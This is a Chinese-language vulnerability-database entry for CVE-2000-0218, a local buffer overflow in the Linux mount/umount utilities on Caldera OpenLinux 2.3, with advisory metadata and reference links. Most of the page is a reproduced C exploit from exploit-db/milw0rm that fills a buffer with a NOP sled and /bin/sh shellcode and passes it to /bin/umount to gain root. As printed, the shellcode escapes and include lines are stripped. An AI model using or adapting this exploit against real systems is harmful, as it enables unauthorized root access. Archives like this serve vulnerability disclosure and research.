Linux权限提升漏洞

Linux权限提升漏洞

漏洞ID 1105256 漏洞类型 缓冲区溢出
发布时间 1996-08-13 更新时间 2000-02-03
图片[1]-Linux权限提升漏洞-安全小百科CVE编号 CVE-2000-0218
图片[2]-Linux权限提升漏洞-安全小百科CNNVD-ID CNNVD-200002-028
漏洞平台 Multiple CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/321
https://www.securityfocus.com/bid/83001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-028
|漏洞详情
Linux安装和卸载中存在缓冲区溢出漏洞。本地用户借助超长相关路径名可以提升根特权。
|漏洞EXP
/* Reminder - Be sure to fix the includes /str0ke */
-------------------------------------- linux_umount_exploit.c ----------
#include 
#include 
#include 
#include 
#include 
#include 

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f"
   "xb8x1bx56x34x12x35x10x56x34x12x8dx4ex0bx8bxd1xcd"
   "x80x33xc0x40xcdx80xe8xd7xffxffxff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   execl(PATH_MOUNT, "umount", buff, NULL);
}


// milw0rm.com [1996-08-13]
|受影响的产品
Caldera OpenLinux 2.3
|参考资料

来源:OSVDB
名称:7004
链接:http://www.osvdb.org/7004
来源:OSVDB
名称:6980
链接:http://www.osvdb.org/6980
来源:CALDERA
名称:CSSA-2000-002.0
链接:ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2000-002.0.txt

相关推荐: Vixie Cron Buffer Overflow Vulnerability

Vixie Cron Buffer Overflow Vulnerability 漏洞ID 1104602 漏洞类型 Boundary Condition Error 发布时间 1999-08-25 更新时间 1999-08-25 CVE编号 N/A CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享